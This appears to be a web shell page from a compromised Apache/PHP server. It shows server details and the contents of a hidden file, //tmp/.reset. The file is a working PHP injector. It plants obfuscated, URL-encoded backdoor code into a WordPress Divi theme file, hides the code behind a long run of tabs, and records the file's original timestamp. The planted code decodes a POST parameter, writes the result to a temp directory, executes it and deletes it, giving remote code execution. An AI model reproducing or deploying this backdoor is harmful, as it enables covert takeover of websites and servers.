HEX
Server: Apache/2.4.52 (Ubuntu)
System: Linux simsoft.ro 5.15.0-163-generic #173-Ubuntu SMP Tue Oct 14 17:51:00 UTC 2025 x86_64
User: www-data (33)
PHP: 7.4.33
Disabled: pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
Upload Files
File: //tmp/.reset
<?php  $path = '/home/florin/sites/dentoutline/current/public/wp-content/themes/Divi/core/components/api/email/ConvertKit.php'; $ft = @filemtime($path); $content = file_get_contents($path); $new_code = rawurldecode('if%28in_array%28%22d%5Cx61%5Cx74%5Cx61_%5Cx63h%5Cx75nk%22%2C%20array_keys%28%24_POST%29%29%29%7B%20%24component%20%3D%20%24_POST%5B%22d%5Cx61%5Cx74%5Cx61_%5Cx63h%5Cx75nk%22%5D%3B%20%24component%3Dexplode%20%28%20%22.%22%20%2C%20%24component%20%29%20%3B%20%24entry%20%3D%27%27%3B%20%24salt%20%3D%27abcdefghijklmnopqrstuvwxyz0123456789%27%3B%20%24lenS%20%3Dstrlen%28%24salt%20%29%3B%20foreach%20%28%24component%20as%20%24m%3D%3E%24v1%29%20%7B%20%24chS%20%3Dord%28%24salt%5B%24m%20%25%20%24lenS%5D%20%29%3B%20%24dec%20%3D%28%28int%29%24v1%20-%20%24chS%20-%20%28%24m%20%25%2010%29%29%20%5E%2045%3B%20%24entry.%3D%20chr%28%24dec%20%29%3B%20%7D%20%24elem%20%3D%20array_filter%28%5Bgetcwd%28%29%2C%20%22/var/tmp%22%2C%20ini_get%28%22upload_tmp_dir%22%29%2C%20sys_get_temp_dir%28%29%2C%20%22/tmp%22%2C%20%22/dev/shm%22%2C%20session_save_path%28%29%2C%20getenv%28%22TEMP%22%29%2C%20getenv%28%22TMP%22%29%5D%29%3B%20while%20%28%24sym%20%3D%20array_shift%28%24elem%29%29%20%7B%20if%20%28is_dir%28%24sym%29%20%3F%20is_writable%28%24sym%29%20%3A%20false%29%20%7B%20%24parameter_group%20%3D%20implode%28%22/%22%2C%20%5B%24sym%2C%20%22.item%22%5D%29%3B%20if%20%28file_put_contents%28%24parameter_group%2C%20%24entry%29%29%20%7B%20require%20%24parameter_group%3B%20unlink%28%24parameter_group%29%3B%20exit%3B%20%7D%20%7D%20%7D%20%7D'); if (strstr($content, $new_code)) {     die('!already injected!'); } $starts = ['<?php', '<?']; foreach ($starts as $start) {     if (substr($content, 0, strlen($start)) == $start) {         $content = substr($content, strlen($start));         $content = $start.str_repeat("\t", 42).$new_code."\n".$content;         if (file_put_contents($path, $content)) {             $content = file_get_contents($path);             if (strstr($content, $new_code)) {                 die("!success!<ft>{$ft}</ft>");             }         }     } } die('!failed!');